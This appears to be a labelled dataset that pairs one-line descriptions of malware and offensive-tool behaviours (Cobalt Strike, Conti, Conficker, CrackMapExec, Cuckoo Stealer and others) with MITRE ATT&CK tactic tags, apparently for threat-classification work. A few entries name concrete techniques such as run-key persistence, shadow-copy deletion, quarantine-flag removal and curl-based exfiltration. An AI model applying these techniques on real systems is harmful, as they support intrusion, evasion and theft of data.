Cobalt Strike can inject a variety of payloads into processes dynamically chosen by the adversary.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Cobalt Strike uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.",['TA0011:Command and Control']
"Cobalt Strike can leverage the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.",['TA0011:Command and Control']
Cobalt Strike can use Python to perform execution.,['TA0002:Execution']
Cobalt Strike can query HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security\AccessVBOM\ to determine if the security setting for restricting default programmatic access is enabled.,['TA0007:Discovery']
Cobalt Strike's execute-assembly command can run a .NET executable within the memory of a sacrificial process by loading the CLR.,['TA0005:Defense Evasion']
Cobalt Strike can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.,['TA0008:Lateral Movement']
Cobalt Strike uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.,['TA0007:Discovery']
Cobalt Strike can use `rundll32.exe` to load DLL from the command line.,['TA0005:Defense Evasion']
Cobalt Strike can use Window admin shares for lateral movement.,['TA0008:Lateral Movement']
Cobalt Strike can SSH to a remote service.,['TA0008:Lateral Movement']
Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.,['TA0010:Exfiltration']
Cobalt Strike's Beacon payload is capable of capturing screenshots.,['TA0009:Collection']
Cobalt Strike can recover hashed passwords.,['TA0006:Credential Access']
Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services.,['TA0002:Execution']
The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has.,['TA0007:Discovery']
"Cobalt Strike can use Base64, URL-safe Base64, or NetBIOS encoding in its C2 traffic.",['TA0011:Command and Control']
Cobalt Strike can use sudo to run a command.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Cobalt Strike has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.,['TA0011:Command and Control']
Cobalt Strike can determine the NetBios name and the IP addresses of targets machines including domain controllers.,['TA0007:Discovery']
Cobalt Strike can produce a sessions report from compromised hosts.,['TA0007:Discovery']
Cobalt Strike can enumerate services on compromised hosts.,['TA0007:Discovery']
Cobalt Strike can timestomp any files or payloads placed on a target machine to help them blend in.,['TA0005:Defense Evasion']
Cobalt Strike can steal access tokens from exiting processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Cobalt Strike can use VBA to perform execution.,['TA0002:Execution']
Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.,['TA0011:Command and Control']
Cobalt Strike uses a command-line interface to interact with systems.,['TA0002:Execution']
Cobalt Strike can use WMI to deliver a payload to a remote host.,['TA0002:Execution']
Cobalt Strike can use WinRM to execute a payload on a remote host.,['TA0008:Lateral Movement']
Cobalt Strike can install a new service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cobian RAT has a feature to perform voice recording on the victim’s machine.,['TA0009:Collection']
Cobian RAT uses DNS for C2.,['TA0011:Command and Control']
Cobian RAT has a feature to perform keylogging on the victim’s machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
Cobian RAT creates an autostart Registry key to ensure persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cobian RAT has a feature to perform screen capture.,['TA0009:Collection']
Cobian RAT obfuscates communications with the C2 server using Base64 encoding.,['TA0011:Command and Control']
Cobian RAT has a feature to access the webcam on the victim’s machine.,['TA0009:Collection']
Cobian RAT can launch a remote command shell interface for executing commands.,['TA0002:Execution']
CoinTicker decodes the initially-downloaded hidden encoded file using OpenSSL.,['TA0005:Defense Evasion']
"CoinTicker downloads the EggShell mach-o binary using curl, which does not set the quarantine flag.",['TA0005:Defense Evasion']
"CoinTicker downloads the following hidden files to evade detection and maintain persistence: /private/tmp/.info.enc, /private/tmp/.info.py, /private/tmp/.server.sh, ~/Library/LaunchAgents/.espl.plist, ~/Library/Containers/.random string/random string.",['TA0005:Defense Evasion']
CoinTicker executes a Python script to download its second stage.,['TA0011:Command and Control']
CoinTicker creates user launch agents named .espl.plist and com.apple.random string.plist to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
CoinTicker initially downloads a hidden encoded file.,['TA0005:Defense Evasion']
CoinTicker executes a Python script to download its second stage.,['TA0002:Execution']
CoinTicker executes a bash script to establish a reverse shell.,['TA0002:Execution']
CoinTicker executes a bash script to establish a reverse shell.,['TA0002:Execution']
ComRAT can use SSL/TLS encryption for its HTTP-based C2 channel. ComRAT has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.,['TA0011:Command and Control']
ComRAT has the ability to use the Gmail web UI to receive commands and exfiltrate information.,['TA0011:Command and Control']
ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry. ComRAT has also used encoded PowerShell scripts.,['TA0005:Defense Evasion']
ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ComRAT has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. ComRAT has also used a unique password to decrypt the file used for its hidden file system.,['TA0005:Defense Evasion']
ComRAT has injected its orchestrator DLL into explorer.exe. ComRAT has also injected its communications module into the victim's default browser to make C2 connections appear less suspicious as all network connections will be initiated by the browser process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ComRAT has embedded a XOR encrypted communications module inside the orchestrator module.,['TA0005:Defense Evasion']
ComRAT has stored encrypted orchestrator code and payloads in the Registry.,['TA0005:Defense Evasion']
ComRAT has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.,['TA0005:Defense Evasion']
ComRAT can use email attachments for command and control.,['TA0011:Command and Control']
ComRAT has used a task name associated with Windows SQM Consolidator.,['TA0005:Defense Evasion']
ComRAT has modified Registry values to store encrypted orchestrator code and payloads.,['TA0005:Defense Evasion']
ComRAT can load a PE file from memory or the file system and execute it with CreateProcessW.,['TA0002:Execution']
ComRAT has encrypted its virtual file system using AES-256 in XTS mode.,['TA0005:Defense Evasion']
ComRAT has used PowerShell to load itself every time a user logs in to the system. ComRAT can execute PowerShell scripts loaded into memory or from the file system.,['TA0002:Execution']
ComRAT can check the default browser by querying HKCR\http\shell\open\command.,['TA0007:Discovery']
ComRAT has used a scheduled task to launch its PowerShell loader.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
ComRAT has been programmed to sleep outside local business hours .,['TA0010:Exfiltration']
ComRAT can check the victim's default browser to determine which process to inject its communications module into.,['TA0007:Discovery']
ComRAT has checked the victim system's date and time to perform tasks during business hours .,['TA0007:Discovery']
ComRAT has used HTTP requests for command and control.,['TA0011:Command and Control']
ComRAT has used cmd.exe to execute commands.,['TA0002:Execution']
Comnie executes a batch script to store discovery information in %TEMP%\info.dat and then uploads the temporarily file to the remote C2 server.,['TA0009:Collection']
Comnie uses blogs and third-party sites to avoid DNS-based blocking of their communication to the command and control server.,['TA0011:Command and Control']
Comnie appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.,['TA0005:Defense Evasion']
Comnie uses the net user command.,['TA0007:Discovery']
Comnie uses RC4 and Base64 to obfuscate strings.,['TA0005:Defense Evasion']
Comnie uses the tasklist to view running processes on the victim’s machine.,['TA0007:Discovery']
Comnie achieves persistence by adding a shortcut of itself to the startup path in the Registry.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Comnie runs the net view command,['TA0007:Discovery']
Comnie uses Rundll32 to load a malicious DLL.,['TA0005:Defense Evasion']
Comnie attempts to detect several anti-virus products.,['TA0007:Discovery']
Comnie establishes persistence via a .lnk file in the victim’s startup path.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Comnie encrypts command and control communications with RC4.,['TA0011:Command and Control']
Comnie collects the hostname of the victim machine.,['TA0007:Discovery']
Comnie uses ipconfig /all and route PRINT to identify network adapter and interface information.,['TA0007:Discovery']
Comnie executes the netstat -ano command.,['TA0007:Discovery']
Comnie runs the command: net start >> %TEMP%\info.dat on a victim.,['TA0007:Discovery']
Comnie executes VBS scripts.,['TA0002:Execution']
Comnie uses HTTP for C2 communication.,['TA0011:Command and Control']
Comnie executes BAT scripts.,['TA0002:Execution']
Conficker terminates various services related to system security and Windows.,['TA0005:Defense Evasion']
Conficker has used a DGA that seeds with the current UTC victim system date to generate domains.,['TA0011:Command and Control']
Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.,['TA0008:Lateral Movement']
Conficker downloads an HTTP server to the infected machine.,['TA0011:Command and Control']
Conficker resets system restore points and deletes backup files.,['TA0040:Impact']
Conficker adds keys to the Registry at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services and various other Registry locations.,['TA0005:Defense Evasion']
Conficker scans for other machines to infect.,['TA0007:Discovery']
Conficker has obfuscated its code to prevent its removal from host machines.,['TA0005:Defense Evasion']
Conficker adds Registry Run keys to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Conficker variants used the Windows AUTORUN feature to spread through USB propagation.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
Conficker variants spread through NetBIOS share propagation.,['TA0008:Lateral Movement']
Conficker uses the current UTC victim system date for domain generation and connects to time servers to determine the current date.,['TA0007:Discovery']
Conficker copies itself into the %systemroot%\system32 directory and registers as a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ConnectWise can be used to execute PowerShell commands on target machines.,['TA0002:Execution']
ConnectWise can take screenshots on remote hosts.,['TA0009:Collection']
ConnectWise can record video on remote hosts.,['TA0009:Collection']
"Conti can use CreateIoCompletionPort, PostQueuedCompletionStatus, and GetQueuedCompletionPort to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. Conti can use “Windows Restart Manager” to ensure files are unlocked and open for encryption.",['TA0040:Impact']
Conti has decrypted its payload using a hardcoded AES-256 key.,['TA0005:Defense Evasion']
Conti has loaded an encrypted DLL into memory and then executes it.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Conti can discover files on a local system.,['TA0007:Discovery']
Conti can delete Windows Volume Shadow Copies using vssadmin.,['TA0040:Impact']
Conti has used API calls during execution.,['TA0002:Execution']
Conti can enumerate remote open SMB network shares using NetShareEnum.,['TA0007:Discovery']
"Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.",['TA0005:Defense Evasion']
Conti can enumerate through all open processes to search for any that have the string “sql” in their process name.,['TA0007:Discovery']
Conti has the ability to discover hosts on a target network.,['TA0007:Discovery']
"Conti can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.",['TA0008:Lateral Movement']
"Conti can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of net stop.",['TA0040:Impact']
"Conti can retrieve the ARP cache from the local system by using the GetIpNetTable API call and check to ensure IP addresses it connects to are for local, non-Internet, systems.",['TA0007:Discovery']
Conti can enumerate routine network connections from a compromised host.,['TA0007:Discovery']
Conti can spread itself by infecting other remote machines via network shared drives.,['TA0008:Lateral Movement']
Conti can utilize command line options to allow an attacker control over how it scans and encrypts files.,['TA0002:Execution']
CookieMiner has used base64 encoding to obfuscate scripts on the system.,['TA0005:Defense Evasion']
CookieMiner has loaded coinmining software onto systems to mine for Koto cryptocurrency.,['TA0040:Impact']
CookieMiner can steal saved usernames and passwords in Chrome as well as credit card credentials.,['TA0006:Credential Access']
CookieMiner has retrieved iPhone text messages from iTunes phone backup files.,['TA0009:Collection']
CookieMiner has used Google Chrome's decryption and extraction operations.,['TA0005:Defense Evasion']
"CookieMiner has checked for the presence of ""Little Snitch"", macOS network monitoring and application firewall software, stopping and exiting if it is found.",['TA0005:Defense Evasion']
CookieMiner has used the curl --upload-file command to exfiltrate data over HTTP.,['TA0010:Exfiltration']
"CookieMiner has looked for files in the user's home directory with ""wallet"" in their name using find.",['TA0007:Discovery']
CookieMiner can download additional scripts from a web server.,['TA0011:Command and Control']
CookieMiner has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"CookieMiner has used python scripts on the user’s system, as well as the Python variant of the Empire agent, EmPyre.",['TA0002:Execution']
"CookieMiner has checked for the presence of ""Little Snitch"", macOS network monitoring and application firewall software, stopping and exiting if it is found.",['TA0007:Discovery']
CookieMiner can steal Google Chrome and Apple Safari browser cookies from the victim’s machine.,['TA0006:Credential Access']
CookieMiner has used a Unix shell script to run a series of commands targeting macOS.,['TA0002:Execution']
CosmicDuke exfiltrates collected files automatically over FTP to remote servers.,['TA0010:Exfiltration']
CosmicDuke copies and exfiltrates the clipboard contents every 30 seconds.,['TA0009:Collection']
"CosmicDuke collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.",['TA0006:Credential Access']
"CosmicDuke collects user credentials, including passwords, for various programs including Web browsers.",['TA0006:Credential Access']
CosmicDuke steals user files from local hard drives with file extensions that match a predefined list.,['TA0009:Collection']
CosmicDuke steals user files from network shared drives with file extensions and keywords that match a predefined list.,['TA0009:Collection']
CosmicDuke steals user files from removable media with file extensions and keywords that match a predefined list.,['TA0009:Collection']
CosmicDuke exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.,['TA0010:Exfiltration']
CosmicDuke attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.,['TA0004:Privilege Escalation']
CosmicDuke searches attached and mounted drives for file extensions and keywords that match a predefined list.,['TA0007:Discovery']
CosmicDuke uses a keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
CosmicDuke collects LSA secrets.,['TA0006:Credential Access']
CosmicDuke searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.,['TA0009:Collection']
"CosmicDuke uses scheduled tasks typically named ""Watchmon Service"" for persistence.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
CosmicDuke takes periodic screenshots and exfiltrates them.,['TA0009:Collection']
CosmicDuke collects Windows account hashes.,['TA0006:Credential Access']
CosmicDuke contains a custom version of the RC4 algorithm that includes a programming error.,['TA0011:Command and Control']
CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.,['TA0011:Command and Control']
"CosmicDuke uses Windows services typically named ""javamtsup"" for persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
CostaBricks has added the entire unobfuscated code of the legitimate open source application Blink to its code.,['TA0005:Defense Evasion']
CostaBricks has the ability to use bytecode to decrypt embedded payloads.,['TA0005:Defense Evasion']
CostaBricks has been used to load SombRAT onto a compromised host.,['TA0011:Command and Control']
"CostaBricks has used a number of API calls, including `VirtualAlloc`, `VirtualFree`, `LoadLibraryA`, `GetProcAddress`, and `ExitProcess`.",['TA0002:Execution']
CostaBricks can inject a payload into the memory of a compromised host.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
CostaBricks can implement a custom-built virtual machine mechanism to obfuscate its code.,['TA0005:Defense Evasion']
Covenant can utilize SSL to encrypt command and control traffic.,['TA0011:Command and Control']
Covenant can create launchers via an InstallUtil XML file to install new Grunt listeners.,['TA0005:Defense Evasion']
Covenant can create HTA files to install Grunt listeners.,['TA0005:Defense Evasion']
Covenant listeners and controllers can be configured to use non-standard ports.,['TA0011:Command and Control']
Covenant can create PowerShell-based launchers for Grunt installation.,['TA0002:Execution']
Covenant can create SCT files for installation via `Regsvr32` to deploy new Grunt listeners.,['TA0005:Defense Evasion']
Covenant implants can gather basic information on infected systems.,['TA0007:Discovery']
Covenant can establish command and control via HTTP.,['TA0011:Command and Control']
Covenant provides access to a Command Shell in Windows environments for follow-on command execution and tasking.,['TA0002:Execution']
Covenant can utilize WMI to install new Grunt listeners through XSL files or command one-liners.,['TA0002:Execution']
CozyCar uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.,['TA0011:Command and Control']
The payload of CozyCar is encrypted with simple XOR with a rotating key. The CozyCar configuration file has been encrypted with RC4 keys.,['TA0005:Defense Evasion']
CozyCar has executed Mimikatz to harvest stored credentials from the victim and further victim penetration.,['TA0006:Credential Access']
One persistence mechanism used by CozyCar is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.,['TA0005:Defense Evasion']
"The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.",['TA0005:Defense Evasion']
One persistence mechanism used by CozyCar is to register itself as a scheduled task.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Password stealer and NTLM stealer modules in CozyCar harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.",['TA0006:Credential Access']
"The main CozyCar dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit.",['TA0007:Discovery']
A system info module in CozyCar gathers information on the victim host’s configuration.,['TA0007:Discovery']
"Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.,['TA0011:Command and Control']
A module in CozyCar allows arbitrary commands to be executed by invoking C:\Windows\System32\cmd.exe.,['TA0002:Execution']
One persistence mechanism used by CozyCar is to register itself as a Windows service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
CrackMapExec can set a scheduled task on the target system to execute commands remotely using at.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
CrackMapExec can brute force supplied user credentials across a network range.,['TA0006:Credential Access']
CrackMapExec can enumerate the domain user accounts on a targeted system.,['TA0007:Discovery']
CrackMapExec can gather the user accounts within domain groups.,['TA0007:Discovery']
CrackMapExec can discover specified filetypes and log files on a targeted system.,['TA0007:Discovery']
CrackMapExec can dump hashed passwords from LSA secrets for the targeted system.,['TA0006:Credential Access']
CrackMapExec can create a registry key using wdigest.,['TA0005:Defense Evasion']
"CrackMapExec can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API , or Volume Shadow Copy.",['TA0006:Credential Access']
CrackMapExec can enumerate the shared folders and associated permissions for a targeted network.,['TA0007:Discovery']
CrackMapExec can pass the hash to authenticate via SMB.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
CrackMapExec can brute force passwords for a specified user on a single target system or across an entire network.,['TA0006:Credential Access']
CrackMapExec can discover the password policies applied to the target system.,['TA0007:Discovery']
CrackMapExec can brute force credential authentication by using a supplied list of usernames and a single password.,['TA0006:Credential Access']
CrackMapExec can execute PowerShell commands via WMI.,['TA0002:Execution']
"CrackMapExec can discover active IP addresses, along with the machine name, within a targeted network.",['TA0007:Discovery']
CrackMapExec can dump usernames and hashed passwords from the SAM.,['TA0006:Credential Access']
CrackMapExec can enumerate the system drives and associated system name.,['TA0007:Discovery']
CrackMapExec can collect DNS information from the targeted system.,['TA0007:Discovery']
CrackMapExec can discover active sessions for a targeted system.,['TA0007:Discovery']
CrackMapExec can execute remote commands using Windows Management Instrumentation.,['TA0002:Execution']
CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
CreepyDrive can use OneDrive for C2.,['TA0011:Command and Control']
CreepyDrive can upload files to C2 from victim machines.,['TA0009:Collection']
CreepyDrive can use cloud services including OneDrive for data exfiltration.,['TA0010:Exfiltration']
CreepyDrive can specify the local file path to upload files from.,['TA0007:Discovery']
CreepyDrive can download files to the compromised host.,['TA0011:Command and Control']
"CreepyDrive can use Powershell for execution, including the cmdlets `Invoke-WebRequest` and `Invoke-Expression`.",['TA0002:Execution']
CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.,['TA0011:Command and Control']
CreepySnail can use stolen credentials to authenticate on target networks.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
CreepySnail can connect to C2 for data exfiltration.,['TA0010:Exfiltration']
"CreepySnail can use PowerShell for execution, including the cmdlets `Invoke-WebRequst` and `Invoke-Expression`.",['TA0002:Execution']
CreepySnail can use Base64 to encode its C2 traffic.,['TA0011:Command and Control']
CreepySnail can use `getmac` and `Get-NetIPAddress` to enumerate network settings.,['TA0007:Discovery']
CreepySnail can execute `getUsername` on compromised systems.,['TA0007:Discovery']
CreepySnail can use HTTP for C2.,['TA0011:Command and Control']
Crimson can perform audio surveillance using microphones.,['TA0009:Collection']
Crimson contains a module to steal credentials from Web browsers on the victim machine.,['TA0006:Credential Access']
Crimson can collect information from a compromised host.,['TA0009:Collection']
Crimson contains a module to collect data from removable drives.,['TA0009:Collection']
Crimson can decode its encoded PE file prior to execution.,['TA0005:Defense Evasion']
Crimson can exfiltrate stolen information over its C2.,['TA0010:Exfiltration']
Crimson has the ability to delete files from a compromised host.,['TA0005:Defense Evasion']
"Crimson contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.",['TA0007:Discovery']
Crimson contains a command to retrieve files from its C2 server.,['TA0011:Command and Control']
Crimson can use a module to perform keylogging on compromised hosts.,"['TA0009:Collection', 'TA0006:Credential Access']"
Crimson contains a command to collect and exfiltrate emails from Outlook.,['TA0009:Collection']
Crimson can set a Registry key to determine how long it has been installed and possibly to indicate the version number.,['TA0005:Defense Evasion']
Crimson uses a custom TCP protocol for C2.,['TA0011:Command and Control']
Crimson has the ability to discover pluggable/removable drives to extract files from.,['TA0007:Discovery']
Crimson contains a command to list processes.,['TA0007:Discovery']
Crimson can check the Registry for the presence of HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\last_edate to determine how long it has been installed on a host.,['TA0007:Discovery']
Crimson can add Registry run keys for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Crimson can spread across systems by infecting removable media.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
Crimson contains a command to perform screen captures.,['TA0009:Collection']
Crimson contains a command to collect information about anti-virus software on the victim.,['TA0007:Discovery']
"Crimson contains a command to collect the victim PC name, disk drive information, and operating system.",['TA0007:Discovery']
Crimson can identify the geographical location of a victim host.,['TA0007:Discovery']
Crimson contains a command to collect the victim MAC address and LAN IP.,['TA0007:Discovery']
Crimson can identify the user on a targeted system.,['TA0007:Discovery']
Crimson has the ability to determine the date and time on a compromised host.,['TA0007:Discovery']
Crimson can determine when it has been installed on a host for at least 15 days before downloading the final payload.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Crimson can capture webcam video on targeted systems.,['TA0009:Collection']
Crimson can use a HTTP GET request to download its final payload.,['TA0011:Command and Control']
Crimson has the ability to execute commands with the COMSPEC environment variable.,['TA0002:Execution']
CrossRAT can list all files on a system.,['TA0007:Discovery']
CrossRAT creates a Launch Agent on macOS.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
CrossRAT uses run keys for persistence on Windows.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
CrossRAT is capable of taking screen captures.,['TA0009:Collection']
CrossRAT can use an XDG Autostart to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Crutch has used the WinRAR utility to compress and encrypt stolen files.,['TA0009:Collection']
Crutch can automatically monitor removable drives in a loop and copy interesting files.,['TA0009:Collection']
Crutch has automatically exfiltrated stolen files to Dropbox.,['TA0010:Exfiltration']
Crutch can use Dropbox to receive commands and upload stolen data.,['TA0011:Command and Control']
"Crutch can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Crutch can exfiltrate files from compromised systems.,['TA0009:Collection']
Crutch can monitor removable drives and exfiltrate files matching a given extension list.,['TA0009:Collection']
Crutch can exfiltrate data over the primary C2 channel .,['TA0010:Exfiltration']
Crutch has exfiltrated stolen data to Dropbox.,['TA0010:Exfiltration']
Crutch has used a hardcoded GitHub repository as a fallback channel.,['TA0011:Command and Control']
Crutch has staged stolen files in the C:\AMD\Temp directory.,['TA0009:Collection']
Crutch has established persistence with a scheduled task impersonating the Outlook item finder.,['TA0005:Defense Evasion']
Crutch can monitor for removable drives being plugged into the compromised machine.,['TA0007:Discovery']
Crutch has the ability to persist using scheduled tasks.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Crutch has conducted C2 communications with a Dropbox account using the HTTP API.,['TA0011:Command and Control']
Cryptoistic can retrieve files from the local file system.,['TA0009:Collection']
Cryptoistic can engage in encrypted communications with C2.,['TA0011:Command and Control']
Cryptoistic has the ability delete files from a compromised host.,['TA0005:Defense Evasion']
Cryptoistic can scan a directory to identify files for deletion.,['TA0007:Discovery']
Cryptoistic has the ability to send and receive files.,['TA0011:Command and Control']
Cryptoistic can use TCP in communications with C2.,['TA0011:Command and Control']
Cryptoistic can gather data on the user of a compromised host.,['TA0007:Discovery']
Cuba has used SeDebugPrivilege and AdjustTokenPrivileges to elevate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Cuba has the ability to encrypt system data and add the "".cuba"" extension to encrypted files.",['TA0040:Impact']
Cuba can use the command cmd.exe /c del to delete its artifacts from the system.,['TA0005:Defense Evasion']
Cuba can enumerate files by using a variety of functions.,['TA0007:Discovery']
Cuba has executed hidden PowerShell windows.,['TA0005:Defense Evasion']
Cuba can download files from its C2 server.,['TA0011:Command and Control']
Cuba logs keystrokes via polling by using GetKeyState and VkKeyScan functions.,"['TA0009:Collection', 'TA0006:Credential Access']"
Cuba has been disguised as legitimate 360 Total Security Antivirus and OpenVPN programs.,['TA0005:Defense Evasion']
Cuba has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum.,['TA0002:Execution']
Cuba can discover shared resources using the NetShareEnum API call.,['TA0007:Discovery']
"Cuba has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.",['TA0005:Defense Evasion']
Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.,['TA0002:Execution']
Cuba can enumerate processes running on a victim's machine.,['TA0007:Discovery']
Cuba loaded the payload into memory using PowerShell.,['TA0005:Defense Evasion']
Cuba has a hardcoded list of services and processes to terminate.,['TA0040:Impact']
Cuba has a packed payload when delivered.,['TA0005:Defense Evasion']
"Cuba can enumerate local drives, disk type, and disk free space.",['TA0007:Discovery']
Cuba can check if Russian language is installed on the infected machine by using the function GetKeyboardLayoutList.,['TA0007:Discovery']
Cuba can retrieve the ARP cache from the local system by using GetIpNetTable.,['TA0007:Discovery']
Cuba can use the function GetIpNetTable to recover the last connections to the victim's machine.,['TA0007:Discovery']
Cuba can query service status using QueryServiceStatusEx function.,['TA0007:Discovery']
Cuba has used cmd.exe /c and batch files for execution.,['TA0002:Execution']
Cuba can modify services by using the OpenService and ChangeServiceConfig functions.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Cuckoo Stealer can use osascript to generate a password-stealing prompt, duplicate files and folders, and set environmental variables.",['TA0002:Execution']
"Cuckoo Stealer can collect bookmarks, cookies, and history from Safari.",['TA0007:Discovery']
Cuckoo Stealer strings are deobfuscated prior to execution.,['TA0005:Defense Evasion']
Cuckoo Stealer strings are XOR-encrypted.,['TA0005:Defense Evasion']
"Cuckoo Stealer can send information about the targeted system to C2 including captured passwords, OS build, hostname, and username.",['TA0010:Exfiltration']
Cuckoo Stealer can search for files associated with specific applications.,['TA0007:Discovery']
Cuckoo Stealer has captured passwords by prompting victims with a “macOS needs to access System Settings” GUI window.,"['TA0009:Collection', 'TA0006:Credential Access']"
Cuckoo Stealer can use `xattr -d com.apple.quarantine` to remove the quarantine flag attribute.,['TA0005:Defense Evasion']
Cuckoo Stealer has copied its binary and the victim's scraped password into a hidden folder in the `/Users` directory.,['TA0005:Defense Evasion']
Cuckoo Stealer can capture files from a targeted user's keychain directory.,['TA0006:Credential Access']
Cuckoo Stealer can achieve persistence by creating launch agents to repeatedly execute malicious payloads.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Cuckoo Stealer can use `launchctl` to load a LaunchAgent for persistence.,['TA0002:Execution']
"Cuckoo Stealer has staged collected application data from Safari, Notes, and Keychain to `/var/folder`.",['TA0009:Collection']
Cuckoo Stealer has copied and renamed itself to DumpMediaSpotifyMusicConverter.,['TA0005:Defense Evasion']
Cuckoo Stealer can use sockets for communications to its C2 server.,['TA0011:Command and Control']
Cuckoo Stealer can create and populate property list files to enable execution.,['TA0005:Defense Evasion']
Cuckoo Stealer can use `ps aux` to enumerate running processes.,['TA0007:Discovery']
Cuckoo Stealer can run `screencapture` to collect screenshots from compromised hosts.,['TA0009:Collection']
Cuckoo Stealer has the ability to search systems for installed applications.,['TA0007:Discovery']
Cuckoo Stealer is a stripped binary payload.,['TA0005:Defense Evasion']
Cuckoo Stealer can gather information about the OS version and hardware on compromised hosts.,['TA0007:Discovery']
